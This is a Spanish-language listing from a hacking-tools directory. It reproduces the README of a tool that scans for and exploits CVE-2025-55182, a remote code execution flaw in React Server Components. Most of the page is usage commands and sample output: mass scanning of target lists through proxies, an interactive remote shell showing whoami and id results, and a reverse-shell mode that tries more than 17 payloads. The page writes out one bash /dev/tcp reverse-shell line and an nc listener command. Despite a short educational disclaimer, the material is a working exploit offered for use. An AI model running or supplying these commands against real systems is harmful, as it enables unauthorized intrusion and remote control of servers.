Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Escáner de vulnerabilidad RCE crítica para React Server Components (CVE-2025-55182). Marco de explotación automatizada con soporte de múltiples cargas útiles, capacidades de proxy y ejecución interactiva de comandos. | Kitploit
Herramientas/GitHubGitHub/alihzsec/cve-2025-55182
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

Escáner de vulnerabilidad RCE crítica para React Server Components (CVE-2025-55182). Marco de explotación automatizada con soporte de múltiples cargas útiles, capacidades de proxy y ejecución interactiva de comandos.

Ver Repositorio
151hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escáner y Exploit de CVE-2025-55182

[!Warning] Este repositorio está destinado únicamente a fines educativos y de investigación.

  • Utilice los PoCs proporcionados exclusivamente en sistemas que posea o tenga permiso explícito para probar.
  • El acceso no autorizado, la explotación o el mal uso de cualquier material en este repositorio es ilegal.
  • El(los) autor(es) no asumen ninguna responsabilidad por daños, mal uso o consecuencias legales derivadas del uso inadecuado.

🔍 Resumen

CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código que afecta a React Server Components versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0. Esta vulnerabilidad se debe a una deserialización insegura de cargas útiles de solicitudes HTTP a puntos finales de funciones del servidor, lo que permite a atacantes no autenticados ejecutar código arbitrario de forma remota.


🐛 Detalles de la Vulnerabilidad

ID CVE: CVE-2025-55182
Versiones Afectadas:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 Instalación

Requisitos previos

  • Python 3.8 o superior
  • pip (gestor de paquetes de Python)

Configuración

  1. Clonar el repositorio
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. Crear un entorno virtual (recomendado)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. Instalar dependencias
root@kitploit:~
pip install -r requirements.txt

📖 Uso

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Argumentos

Argumentos


🎯 Modo Detección

Escanear un solo objetivo

root@kitploit:~
python3 main.py -d -u https://example.com

Escanear múltiples objetivos desde archivo

root@kitploit:~
python3 main.py -d -l targets.txt

Escanear con proxy

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

Modo silencioso (solo mostrar objetivos vulnerables)

root@kitploit:~
python3 main.py -d -l targets.txt -s

Escaneo multihilo

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 Modo Explotación

Shell interactivo

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Luego seleccione [i] para shell interactivo:

root@kitploit:~
Elija método de explotación:
  [i] Shell interactivo
  [r] Reverse shell

Ingrese su opción (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

Reverse Shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Luego seleccione [r] para reverse shell y elija el tipo de payload:

Opción 1: Payloads predeterminados (Recomendado)

root@kitploit:~
Elija método de explotación:
  [i] Shell interactivo
  [r] Reverse shell

Ingrese su opción (i/r): r

Elija opción de payload:
  [d] Usar payloads predeterminados (Probar múltiples reverse shells)
  [c] Proporcionar payload personalizado

Ingrese su opción (d/c): d

Ingrese su IP y puerto en este formato:
Ejemplo: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Configure su listener con este comando:
nc -lvnp 4444

Presione ENTER cuando su listener esté listo...

La herramienta intentará automáticamente más de 17 payloads de reverse shell diferentes hasta que uno tenga éxito.

Opción 2: Payload personalizado

root@kitploit:~
Ingrese su opción (d/c): c

Ingrese su payload de reverse shell personalizado:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 Referencias

  • Aviso de seguridad oficial de React
  • Aviso de seguridad de Meta
  • Aviso de seguridad de Vercel
  • Aviso de seguridad de Next.js
  • Detalles de CVE

Si encuentra útil esta herramienta, considere darle una estrella! ⭐
Hecho con ❤️ para la comunidad de seguridad
Descargar herramienta
ArgumentoDescripción
-d, --detectionEjecutar en modo detección (escanear vulnerabilidades)
-e, --exploitEjecutar en modo explotación (explotar un solo objetivo)
-u, --url URLURL de un solo objetivo para escanear/explotar
-l, --list FILEArchivo con lista de URLs objetivo (solo modo detección)
-p, --proxy URLURL de proxy único (ej. http://127.0.0.1:8080)
-pl, --proxy-list FILEArchivo con lista de URLs de proxy (una por línea)
-t, --threads NNúmero de hilos concurrentes (predeterminado: 10, solo modo detección)
-s, --silentModo silencioso - solo mostrar objetivos vulnerables (solo modo detección)
-o, --output [FILE]Guardar objetivos vulnerables en archivo (solo modo detección). Si no se proporciona nombre de archivo, usa el predeterminado: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugHabilitar registro de depuración: muestra detalles de respuesta e intentos de reintento (no disponible en modo silencioso)